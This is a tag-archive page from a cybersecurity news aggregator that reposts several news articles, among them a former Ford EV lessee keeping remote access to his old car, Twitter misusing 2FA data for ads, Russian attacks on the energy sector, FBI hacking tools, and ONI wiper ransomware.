used

now browsing by tag

 
 

When Your Used Car is a Little Too ‘Mobile’ — Krebs on Security

Source: National Cyber Security – Produced By Gregory Evans

Many modern vehicles let owners use the Internet or a mobile device to control the car’s locks, track location and performance data, and start the engine. But who exactly owns that control is not always clear when these smart cars are sold or leased anew. Here’s the story of one former electric vehicle owner who discovered he could still gain remote, online access to his old automobile years after his lease ended.

Mathew Marulla began leasing a Ford Focus electric vehicle in 2013, but turned the car back in to Ford at the end of his lease in 2016. So Marulla was surprised when he recently received an email from Ford.com stating that the clock in his car was set incorrectly.

Out of curiosity, Marulla decided to check if his old MyFordMobile.com credentials from 2016 still worked. They did, and Marulla was presented with an online dashboard showing the current location of his old ride and its mileage statistics.

The dashboard also allowed him to remotely start the vehicle, as well as lock and unlock its doors.

https://krebsonsecurity.com/

Mathew Marulla turned in his leased Ford EV to Ford 4 years ago, so he is no longer the legal owner of the car. But he can still remotely track its location and usage, lock and unlock it, and start the engine.

“It was a three-year lease from Ford and I turned it in to Ford four years ago, so Ford definitely knows I am no longer the owner,” Marulla said, noting that the dashboard also included historic records showing where the Focus had been driven in days prior.

“I can track its movements, see where it plugs in,” he said. “Now I know where the current owner likely lives, and if I watch it tomorrow I can probably figure out where he works. I have not been the owner of this vehicle for four years, Ford knows this, yet they took no action whatsoever to remove me as the owner in this application.”

Asked to comment on Marulla’s experience, a spokesperson for Ford said all Ford dealerships are supposed to perform a “master reset” as part of their used car checklist prior to the resale of a vehicle. A master reset (carried out via the vehicle’s SYNC infotainment screen by a customer or dealer) disassociates the vehicle from all current accounts.

“A master reset cleans phone data and removes previous Ford Pass and My Ford Mobile connections,” the company said in a statement released to KrebsOnSecurity. “Once complete, a previous owner will no longer be able to connect to the vehicle when they log in to My Ford Mobile or Ford Pass.”

As Marulla’s experience shows, if you’re in the market for a used car you should probably check whether it’s possible to reset the previous owner’s control and/or information before purchasing it, or at least ask the dealership to help you ensure this gets done once the purchase is made.

And if you’re thinking of selling your car, it’s a good idea to clear your personal data from the vehicle first. As the U.S. Federal Trade Commission advises, some cars have a factory reset option that will return the settings and data to their original state.

“But even after a factory reset, you may still have work to do,” reads an FTC consumer privacy notice from 2018. “For example, your old car may still be connected to subscription services like satellite radio, mobile Wi-Fi hotspots, and data services. You need to cancel these services or have them transferred to your new vehicle.”

By the way, this issue of de-provisioning is something of a sticky wicket, and it potentially extends well beyond vehicles to a number of other “smart” devices that end up being resold or refurbished. This is doubly so for Internet-connected/capable devices whose design may give the previous owner a modicum of access to or control over the device in question regardless of what steps the new owner takes to limit such access (particularly some types of security cameras).



Tags: Focus EV, Ford, Mathew Marulla, MyFordMobile.com, U.S. Federal Trade Commission

The source of this story comes from click here!

The post When Your Used Car is a Little Too ‘Mobile’ — Krebs on Security appeared first on National Cyber Security.

View full post on National Cyber Security

#cyberfraud | #cybercriminals | Twitter Admits User Phone Numbers, Email Data Used For Ads

Source: National Cyber Security – Produced By Gregory Evans

Email addresses and phone numbers might have been misused

No personal data was shared externally by Twitter

No reports on the number of people impacted have come out yet

In a recent incident of a data breach, Twitter has confirmed that user data like email addresses and phone numbers provided by users for security purposes may have been unintentionally used for advertising purposes. 

According to a news report, currently, Twitter is unable to share with certainty the number of people impacted by the breach. However, the US-based company also asserted that no personal data was ever shared externally with their partners or any other third parties.  

In a statement, Twitter highlighted that the personal data, which were provided for safety or security purposes (for example, two-factor authentication) may have been inadvertently used for advertising purposes, specifically in their Tailored Audiences and Partner Audiences advertising system, which helps in creating relevant remarketing campaigns. 

While explaining how the breach occurred, Twitter is a statement said, “When an advertiser uploaded their marketing list, it may have matched people on our platform to that list based on the email or phone number that the user had provided for safety and security purposes.”

As of September 17, Twitter has acknowledged the problem and claimed that it has stopped using numbers or email addresses collected for safety or security purposes, for advertising. 

Although Twitter apologised for this error, it also shared that they have no idea how many people were impacted by this. “We’re very sorry this happened and are taking steps to make sure we don’t make a mistake like this again,” the microblogging site added in the statement. 

Twitter’s average monetisable daily active usage (mDAU) has grown from 122 million in 2018 June quarter to 139 million (29 Mn in the US and 110 Mn from international markets) in 2019 June quarter. Even in the previous quarter, it had a mDAU of 134 million.  

Data Breach On Rise: How Is India Protecting Itself? 

Indian Prime Minister Narendra Modi has touted data as the new oil and new gold and rightly so as it has become very lucrative for hackers to steal and sell the same. Earlier, online food delivery startups Zomato, and FreshMenu, fintech startup EarlySalary, McDonald’s India, Oyo, Ashley Madison, Sony, and many others have been the victims of data breaches.

Social media sites like Instagram and Facebook have also been affected by a data breach by advertisers. Recently, Instagram Ad partner was banned for scraping user data without consent. Even Facebook-linked phone numbers of over 419 Mn users were found on unsecured servers.

Whatsapp, which was planning to introduce its payments feature WhatsApp Payments by the end of this year, is also facing difficulties because of the government’s concerns over the messaging platform’s data localisation compliance. In September, National Payments Corporation of India (NPCI) had asked WhatsApp to make changes in its policy to get the final approval for the launch of payments in India. NPCI had asked the instant messaging app to make changes in its data-compliance framework that prohibits storing payment data outside of India.

In May, India was reported as the second most cyberattacks affected country between the years 2016 to 2018. With the average cost for a data breach in India increased to 7.9% since 2017, the average cost per breached record has mounted to INR 4,552 ($64).

The Reserve Bank of India too recorded a total of 2,059 cases of cyber fraud in 2017-18 as compared to 1,372 cyber fraud cases in 2016-17.

Source link

The post #cyberfraud | #cybercriminals | Twitter Admits User Phone Numbers, Email Data Used For Ads appeared first on National Cyber Security.

View full post on National Cyber Security

Here Are The #Clever Means #Russia Used To #Hack The #Energy #Industry

Last July, officials from the Federal Bureau of Investigation and the Department of Homeland Security revealed that Russian hackers were behind cyber intrusions into the U.S. energy power grid. The intrusion illustrated the severe threat that hackers pose to our most critical industries – energy, finance, healthcare, manufacturing and transportation.

The DHS and FBI downplayed the danger in a joint statement: “There is no indication of a threat to public safety, as any potential impact appears to be limited to administrative and business networks.”

But that might not be the end of it. Russia may be laying the groundwork for more damaging hacks, on America as well as other nations, using new cyber weapons like CrashOverride and BlackEnergy 3.

In 2015, Russia tested this on the Ukrainian capital of Kiev. These tools were specifically developed to disrupt electric power grids and it blacked out 225,000 people in the Ukraine.

One might wonder what is Russia’s end game for this kind of attack. To hurt us financially? To show us how vulnerable we are? In preparation for a more sinister attack?

Is it to punish America for anti-Russian policies? The White House expelled 60 Russians from the United States this week, joining western allies in response to Russia’s poisoning of a former Russian spy in Britain with what was a banned chemical weapon.

When DHS and FBI dissected the hackers’ tradecraft, it turned out to be very clever indeed. Mark Orlando, Chief Technology Officer for cyber services at Raytheon, broke down the particulars of why the new world of hacking works so well in America.

One of the attackers’ main strategies is to divide targets into two groups – intended targets which are the energy companies themselves, and staging targets like vendors, suppliers, even trade journals and industry websites.

Instead of going straight to the larger and better-protected targets, like a $60 billion energy company with a cyber security department, the hackers worked their way into the smaller and less secure companies’ networks like those that supply the big ones with smaller equipment. Or the local utilities that are partnered with them. Local regulators may also have good access.

There is even an Electric Utility Industry Sustainable Supply Chain Alliance that many of the large energy companies use.

When the hackers get into those systems, they use that access to gather intelligence and set traps for the larger company.

This targeting of the supply chain partners is brilliant. The manufacturer of natural gas turbines that supply a gas power plant would have great access to the plant’s systems and management, would probably have password access, and would not be questioned very hard.

‘It’s important to raise awareness,’ says Orlando. ‘These details, if taken by themselves, might not seem that impactful. When presented with the entire story, we can see it was part of a larger, sustained campaign, potentially causing a lot of damage.’

This is a long-term strategy that takes patience – just the kind of thing traditional espionage has perfected over the last century.

America seems to be getting the message. A recent survey from Raytheon and Ponemon showed that two-thirds of cyber security executives and chief information security officers in America, Europe and the Middle East believe cyber extortion, such as ransomware and data breaches, will increase in frequency and payout.

The traps themselves are pretty imaginative. Many are based in social media. No one would suspect a cute kitten video of hiding malware. But they do. And if your co-worker is a kitten-nut, they may not hesitate to download that video without thinking that it is a trap.

‘The weakness in cybersecurity are the users themselves, those that are not necessarily computer-savvy,’ says Quinn Mockler, a young cyber security researcher at Columbia Basin College in the Tri-Cities Washington near the Hanford Nuclear Reservation. ‘People overall need better awareness of cyber security. Otherwise, we will be open to constant attack.’

In one example discussed by Orlando, the attackers found a harmless-looking photo on one company’s human resources site that contained valuable information – the manufacturer and model of a certain piece of control-systems equipment.

That provided critical information on how the plant runs and set up the next phase of the attack – spear phishing – which is the use of customized, highly deceptive emails designed to deliver malware. Using resumés, curricula vitae, policy documents and other common messages, the hackers made reference to these control systems creating plausible, well-informed emails likely to fool someone into opening a malware-laced attachment.

One was an invitation to a company New Year’s Eve party.

Another common method used to infiltrate is called a watering-hole attack which plants malicious code in a place the targets trust, then waits for them to come pick it up.

In the energy-sector attack, DHS and FBI found that watering holes included trade publications and informational websites that dealt with matters specific to the energy industry. The hackers corrupted those sites and altered them to contain malicious content. The targets saw no reason to suspect anything was wrong when they visited them.

‘It’s a low-complexity, low-effort, high-yield attack,’ Orlando says. ‘With relatively little effort, you can target lots and lots of users.’ The best defense, he says, is for a company to monitor its own networks for signs that a user may have unwittingly stumbled into a watering-hole.

Much of the malware in the energy-sector attack was designed to capture user credentials, or the digital identity of someone authorized to use a target network. Credential harvesting includes usernames and passwords, hashes or a computer’s digital signature, often stolen through tricking someone at a false login page for a familiar site.

The hackers’ spear phishing emails contained documents that ordered the target’s computer to retrieve data from a server – one the hackers either owned themselves, or had commandeered. Once the hackers had the target’s credentials, they could apply techniques to reveal the password in plain text.

Requiring multiple modes of authentication to sign in, such as a thumbprint or a security token code, is the best way to thwart this type of attack.

Hackers imitated login pages themselves, planting a link that redirected users to a page whose ‘username’ and ‘password’ fields fed credentials straight to them. Orlando notes, ‘If I can come into your environment using authorized credentials, detecting that just became exponentially more difficult.’

There are two main lessons from the power-grid hack, Orlando says. First, businesses should know that small hacking attempts like suspicious emails are often part of a larger campaign. Also, they should understand that truly cyber-secure businesses look beyond their own networks. Like tracking the spread of a new Flu virus.

‘Your network isn’t just your network. It’s your network, plus your trusted partners, plus your suppliers,’ he says. ‘If you’re not mitigating risk across the entire cyber ecosystem, you’re potentially missing a very large exposure to your business.’

Since smaller companies are the hacker’s first stop on the way to the bigger targets, Orlando recommends monitoring computer networks for unusual activity, installing security patches regularly, developing a response plan to disclose breaches and limit damage, and communicate up and down the supply chain on cyber security.

Data diodes, air gaps, field programmable gate arrays – all the sophisticated approaches to cyber security that the nuclear and defense industries use – eventually need to be part of everyone’s defense.

But as Orlando summed up, the daunting new reality in modern cyber security is that a company’s cyber defenses are only as strong as the defenses of everyone connected to it.

advertisement:

The post Here Are The #Clever Means #Russia Used To #Hack The #Energy #Industry appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

The #FBI Used #Classified #Hacking #Tools in Ordinary #Criminal #Investigations

The FBI’s Remote Operations Unit (ROU), tasked with hacking into computers and phones, is one of the Bureau’s most elusive departments. But a recent report from the Office of the Inspector General (OIG) for the Department of Justice has now publicly acknowledged the unit’s existence seemingly for the first time. The report also revealed that the ROU has used classified hacking tools—techniques typically reserved for intelligence purposes—in ordinary criminal investigations, possibly denying defendants the chance to scrutinize evidence, as well as destabilizing prosecutors’ cases against suspects.

“Using classified tools in criminal cases is risky for all sides,” Ahmed Ghappour, associate professor of law at Boston University School of Law, and who has researched law enforcement hacking extensively, told Motherboard in a Twitter message.

The ROU is part of the FBI’s Operational Technology Division (OTD), which handles the Bureau’s more technical surveillance methods. The OIG’s report says ROU “provides computer network exploitation capabilities” and has “engineers and vendors who attempt to develop techniques that can exploit mobile devices.” A previous Wall Street Journal report said the FBI can use malware to remotely activate microphones on Android devices.

In 2013, then American Civil Liberties Union (ACLU) principal technologist Chris Soghoian uncovered ROU’s existence by piecing together LinkedIn profiles and sections of documents released through the Freedom of Information Act. Soghoian found that an Eric Chuang heads the ROU, and it appears Chuang is still leading the unit now—the OIG report mentions the current head became chief in 2010.

While most of the OIG’s new report focuses on how the FBI did not fully explore its technical options for accessing the iPhone of one of the San Bernardino terrorists in 2016, several sections shine more light on the ROU, and how they are using their hacking tools. One mentions the ROU chief, based on long standing policy, sees a “line in the sand” against using national security tools in criminal cases—this was why the ROU initially did not get involved at all with finding a solution to unlocking the San Bernardino iPhone. Indeed, it’s important to remember that as well as a law enforcement agency, the FBI also acts as an intelligence body, gathering information that may be used to protect the country, rather than bring formal charges against suspects.

But that line can be crossed with approval of the Deputy Attorney General to use the more sensitive techniques in ordinary investigations, the report adds.

“The ROU Chief was aware of two instances in which the FBI invoked these procedures,” a footnote in the report reads. In other words, although it seemingly only happened twice, the FBI has asked for permission to use classified hacking techniques in a criminal case.

It’s not clear which two cases the ROU Chief is referring to. However, the FBI previously deployed a Tor Browser exploit to over 8,000 computers around the world, including some in China, Russia, and Iran, based on one, legally contentious warrant. At the time of the operation in February 2015, the tool was unclassified. But as Motherboard found using court records, the following year the FBI moved to classify the exploit itself for reasons of national security, despite the case being a criminal child pornography investigation.

Motherboard’s recent investigation into the exploit industry found that an Australia-based company called Azimuth Security, along with its partner Linchpin Labs, has provided exploits to the FBI, including one for breaking through the Tor Browser.

Using classified tools in a criminal investigation may pose issues for both prosecutors and defendants. If the FBI used a classified technique to identify a suspect, does the suspect find out, and have a chance to question the legality of the search used against them?

“When hacking tools are classified, reliance on them in regular criminal investigations is likely to severely undermine a defendant’s constitutional rights by complicating discovery into and confrontation of their details,” Brett Kaufman, a staff attorney at the ACLU, told Motherboard in an email. “If hacking tools are used at all, the government should seek a warrant to employ them, and it must fully disclose to a judge sufficient information, in clear language, about how the tools work and what they will do,” he added.

And on the flip side, if the FBI uses a classified and sensitive tool in an ordinary case, and has to reveal information about it in court, the exploit may then be fixed by the affected vendor, such as, say, Apple. Some may seen that as a positive, but the FBI might have to drop their charges against a criminal as well.

“It’s also a risk for the government, who may be ordered to disclose classified information to the defense to satisfy due process, or face dismissal of the case,” Ghappour said.

With the mentioned Tor Browser attack, a judge ordered the FBI to give defense counsel the code of the exploit; the FBI refused, meaning the evidence the related malware obtained was thrown out altogether.

A spokesperson for the FBI declined to comment on the ROU’s cross-over into criminal cases, and instead pointed to page 16 of the report, which reads, in part, that “FBI/OTD has realigned mission areas for several Units in preparation for a larger re-organization.”

advertisement:

The post The #FBI Used #Classified #Hacking #Tools in Ordinary #Criminal #Investigations appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

How Can #Blockchain Be #Used to Aid #Cybersecurity?

With the rapid advancement of internet-based technologies, cybersecurity is a constant cloud looming on the horizon. As the technology evolves, so too, do the cybercriminals. Their constant efforts to steal valuable data and disrupt business through DDoS attacks are increasingly sophisticated.

Holding companies hostage and monetizing data through ransomware techniques is sadly par for the course. In fact, it’s estimated that cybersecurity alone costs the global economy some $450 billion a year. With IT professionals scrambling to stay one step ahead of the hackers, how can blockchain be used to aid cybersecurity?

NO SINGLE POINT OF FAILURE

The decentralized nature of the blockchain means that there is no single point of failure, nor one central database waiting to be hacked. Information is stored over several databases, and each block is linked to the next in the chain, making no “hackable” entrance. This provides infinitely greater security than our current, centralized structures.

REMOVING HUMAN ERROR

The weakest link in our current system is simple logins that are vulnerable to being cracked. Blockchain can remove human error in cybersecurity, as businesses can authenticate devices without the need for a password system. Each device is provided with a specific SSL certificate, rather than a password.

Read More….

advertisement:

The post How Can #Blockchain Be #Used to Aid #Cybersecurity? appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Park Hill #parent says #school #laptop was used for #inappropriate #relationship with #student

Source: National Cyber Security News

A metro school district is making big changes in cybersecurity. It comes after a parent says things got so bad for her daughter, she was forced to pull her child out of school and move her out of state.

41 Action News sat down with a concerned mother who wished to remain anonymous. Her daughter once attended the Park Hill School District.

She said the problems began shortly after her daughter was issued a laptop by the district. She said her daughter then set up a Facebook account with her school email address, on her school laptop.

“This Facebook account was used by her boyfriend to help groom her for an inappropriate, sexual relationship,” said the mother. “Over a 6-week period, there’s 650 printable pages of him talking to her and trying to teach her about bondage relationships.”

The mother said her daughter’s personality changed abruptly and feels the inappropriate relationship would’ve been caught sooner if district leaders put more safeguards on those laptops.

“She got physically violent with me one time. If they’re searching for guns, violence, porn, then someone should be alerted to this. Whether it’s inside the school or not.

Read More….

advertisement:

View full post on National Cyber Security Ventures

Hackers #Release #Huawei #Router #Exploit Code Used in #IoT #Botnet

Source: National Cyber Security – Produced By Gregory Evans

Today’s topics include the Huawei router exploit code used in the Satori IoT botnet going public; a rise in GPU sales in 2017; and LinkedIn expanding its job seeker toolkit ahead of the new year.

Researchers at NewSky Security reported Dec. 28 that code from the Satori internet of things botnet that exploits a Huawei router vulnerability has been publicly posted on the internet. The vulnerability, which internet service providers had shut down earlier this month, was discovered by security firm Check Point, which reported the issue to Huawei on Nov. 27.

“An authenticated attacker could send malicious packets to port 37215 to launch attacks. Successful exploit could lead to the remote execution of arbitrary code,” Huawei said.

Check Point reported that the root cause of the flaw is linked to Huawei’s implementation of the Universal Plug and Play protocol via the TR-064 technical report standard. Huawei implementation allowed remote attackers to inject arbitrary commands, which hackers used to build the Satori botnet.

Maya Horowitz, Threat Intelligence Group Manager at Check Point, said “[Users should] change the default password on their router,” and recommends that end users running Huawei routers behind a firewall or Intrusion Prevention System should configure those devices to block the exploit’s traffic.

Jon Peddie Research released Dec. 29 its annual review of graphics processing unit developments, and the results indicate good things for the year past and for 2018. Despite an overall slowdown in worldwide sales of PCs, PC-based GPU sales have been increasing at the same rate as mobile devices.

Sales in the console market have also increased over the year, where integrated graphics are in every console. The IT business has seen a few new GPUs showing the path for future developments and subsequent applications, and 2017 was a solid year for GPU development driven by games, eSports, artificial intelligence, cryptocurrency mining and simulations.

Autonomous vehicles started to become a reality, as did augmented reality. Mobile GPUs, exemplified by Qualcomm, ARM and Imagination Technologies, introduced some advanced devices with long battery life and screens at or approaching 4K.

Jon Peddie Research said, “2018 is going to be an even more amazing year [for GPUs], with AI being the leading applications that will permeate every sector of our lives.”

LinkedIn, Microsoft’s business-focused social network, has new features to help members land a new job or build the skills required for a career change.

This is just in time for the many people, particularly IT workers, who are considering switching jobs in 2018, according to Spiceworks’ recent 2018 IT Career Outlook survey. Nearly a third of IT workers in North America and Europe plan to look for a new job in 2018 with higher salaries and opportunities to improve their skills sets.

LinkedIn is now issuing monthly notifications alerting users to trending skills among folks with the same job title. If members already possess a given skill, they can add it to their profiles, improving the chances that interested employers will come calling. If they lack the expertise, users can click on a skill to see corresponding LinkedIn Learning courses, along with the organizations that are hiring people with that skill.

The post Hackers #Release #Huawei #Router #Exploit Code Used in #IoT #Botnet appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

This #destructive #wiper #ransomware was used to #hide a #stealthy #hacking #campaign

Source: National Cyber Security – Produced By Gregory Evans

This #destructive #wiper #ransomware was used to #hide a #stealthy #hacking #campaign

Ransomware is being used to hide an elaborate, targeted hacking campaign which went undetected for months before the attackers pulled the plug and encrypted hundreds of machines at once in an effort to remove stolen data while also covering their tracks.

The campaign targeted several Japanese organisations in attacks which lasted from three to nine before a ransomware attack used a wiper on compromised machines in an effort to hide the operation.

Forensic investigation of the infected machines by researchers at Cybereason has led them to the conclusion that the attacker made the attempt to wipe evidence of the operation and destroy any traces of attack.

The name of the ransomware comes from the .oni file extension of encrypted files as well as the email address in the ransom note, which translates to “Night of the Devil” – the name researchers have given to the operation. Researchers note that ONI shares much of its code with GlobeImposter ransomware.

Attacks using ONI ransomware have been carried out against Japanese targets for some time, but the investigation into the latest wave of attacks uncovered a new variant, MBR-ONI, a form of the ransomware which comes equipped with bootkit features.

The new bootkit ransomware is based on DiskCryptor, a legitimate disk encryption tool, the code of which has also been found in Bad Rabbit ransomware.

While MBR-ONI bootkit ransomware was used against a controlled set of targets, such as Active Directory server and other critical assets, ONI was used against the rest of the endpoints in an infected network.

The ONI-based attacks all begin in the same way, with spear-phishing emails distributing malicious Office documents which drops the Ammyy Admin remote access tool.

Once inside the system, attackers map the internal networks, harvesting credentials and moving laterally through the system – researchers suspect that the leaked NSA SMB exploit EternalBlue plays a role in enabling the attackers to spread through the network.

Ultimately compromise critical assets including the domain controller to gain full control of the network and the ability to exfiltrate any data deemed important.

Once the attackers are done with the infected network, ONI and MBR-ONI ransomware was run.

While ONI does provide a ransom note and the prospect of recovering encrypted data, researchers believe MBR-ONI is designed to never provide a decryption key, but rather as a wiper to cover the attackers’ footprints and conceal the true goals of the attack: espionage and removing data over a period of months.

During investigations of targeted organisations, it was found that some had been compromised since December 2016, indicating long-term planning and sophistication on behalf of the attackers.

While ONI and the newly discovered MBR-ONI exhibit all the characteristics of ransomware, our analysis strongly suggests that they might have actually been used as wipers to cover an elaborate scheme,” said Assaf Dahan, director of advanced security services at Cybereason

“The use of ransomware and/or wipers in targeted attacks is not a very common practice, but it is on the rise. We believe ‘The Night of the Devil’ attack is part of a concerning global trend in which threat actors use ransomware/wipers in targeted attacks,” he added.

Researchers haven’t been able to comprehensively conclude who is behind the campaign and Russian language in the code could provide a clue or a diversion in equal measure.

“The question of attribution is a tricky one. The Russian language traces found in the binary files could suggest that there is a Russian threat actor behind the attack. That being said, this kinda of data can also be easily manipulated by the attackers to throw researchers off track,” Dahan told ZDNet.

The post This #destructive #wiper #ransomware was used to #hide a #stealthy #hacking #campaign appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Today’s bank heists aren’t what they used to be with the battle now fought out in cyberspace

Source: National Cyber Security – Produced By Gregory Evans

Today’s bank heists aren’t what they used to be with the battle now fought out in cyberspace

Bank heists aren’t what they used to be. With sophisticated underground networks of hackers able to remotely swipe millions from financial institutions within seconds, many now look back wistfully on the days when a bank robbery involved a getaway chase, fat wads of cash and a bandit eye mask.

“Cyber is now the tool of choice for significant financial crime: it is easier to dispose of the stolen assets and the crime is easier to get away with,” says Andrew Moir, head of global cyber security at law firm Herbert Smith Freehills. “Compare the $81m (£61m) Bank of Bangladesh cyber heist [stolen from the bank’s account at the US Federal Reserve last year] to the £25m Hatton Garden jewel raid.”

The City of London is eager to show it is a leader in the fight against computer crime, particularly as Brexit rumbles in the background and threatens London’s status as Europe’s financial centre.

Dominic Raab, the justice minister, said last month that a decision to open a new court in the City to focus on cyber crime was a “terrific advert for post-Brexit Britain” while Catherine McGuinness, the City’s top official, is heading to Israel to meet cyber security experts and academics, with the aim of mirroring Tel Aviv’s success in attracting start-ups.

“[It’s] the first time we’ve made a trip like this, there is a fresh focus on cyber from us as an organisation,” Ms McGuinness made clear, adding that she will be looking at potential partnerships with specialists in Israel. She uses the new court, which is being funded by the City of London Corporation and will be based in the Square Mile, as an example for how the UK is keeping up with financial crime in the 21st century.

The UK was the target of one in eight cyber attacks in Europe between January and September last year, according to research from cyber security firm FireEye. No wonder then that the City is ploughing money into the issue – all too aware that finance is among the most targeted industries. The UK’s National Cyber Security Centre has dealt with more than 600 “significant” cyber attacks since it was opened just a year ago by the Government Communications Headquarters (GCHQ), and today is hosting a summit for EU member states to share what it has learnt.

Few are aware of the importance of tackling this issue more than Robert Hannigan, the former GCHQ boss who joined the intelligence agency just after the Edward Snowden scandal in 2014 and left earlier this year. Credited with preparing the UK for a new era of cyber challenges (he was behind the launch of the cyber centre), he is now advising businesses on how to prepare for future risks.

“Attacks used to be very crude misspelled [emails], now they are sophisticated – we have seen criminals researching targets, seeing where a CEO’s children go to school so an email looks like it comes from there,” he says, illustrating how hard it can be to spot a red flag. “These aren’t teenagers in a bedroom, these are seriously organised groups. They’ve taken the internet and gig economy model and hire people in.”

Having been Tony Blair’s adviser on Northern Ireland peace talks and a former director general of defence and intelligence at the Foreign Office, Mr Hannigan has seen first hand the changes in the way criminal gangs operate. Many have grown up with the internet, and with technology moving so fast one of the biggest challenges is trying to forecast what the techniques will be in 10 or 20 years, he says.

Trying to make that prediction will require a lot more specialists than are currently available. The UK has a shortage of experts, with start-ups competing to recruit convicted hackers for expertise. Lobby group TheCityUK told The Daily Telegraph this year that it wants to see cyber schools in each UK city with a big financial services presence so that institutions aren’t scrabbling for talent, with plans to transform Bletchley Park – used to crack codes in the Second World War – into the UK’s first National College of Cyber Security delayed by a year. Part of Ms McGuinness’s trip to Israel this week will be about learning how to draw cyber entrepreneurs to the UK.

Mr Hannigan, who is currently advising Lloyd’s of London insurer Hiscox on potential cyber risks ,warns that, while the finance sector is miles ahead of many others in terms of cyber security and awareness, institutions can be “naive” when it comes to state-linked cyber threats with many underestimating the extent to which some countries work with crime groups.

“As state and crime threats merge in some areas, that’s something which needs more work,” he said, using North Korea as an example. “Institutions tend to think that states wouldn’t want to damage the international financial system which they have a stake in, but of course North Korea doesn’t have a stake in it and doesn’t really care.

“That crossover of crime and state is here to stay. I think, thinking beyond fraud and crime, companies need to think about the motives of states that might want to access their data. Financial institutions hold very personal data about millions of people.”

“Cyber crime certainly is capable of causing the next financial crisis – anything that undermines confidence in the banking system could have that effect,” adds Mr Moir, underlining the severity of a potential attack. “Suppose hackers penetrate a bank’s systems and manipulate balances or mortgages so they can no longer be trusted?”

 

The post Today’s bank heists aren’t what they used to be with the battle now fought out in cyberspace appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Russian government hackers used antivirus software to steal U.S. cyber capabilities

Source: National Cyber Security – Produced By Gregory Evans

Russian government hackers lifted details of U.S. cyber capabilities from a National Security Agency employee who was running Russian antivirus software on his computer, according to several individuals familiar with the matter. The employee had taken classified material home to work on it on his computer, and his use of…

The post Russian government hackers used antivirus software to steal U.S. cyber capabilities appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures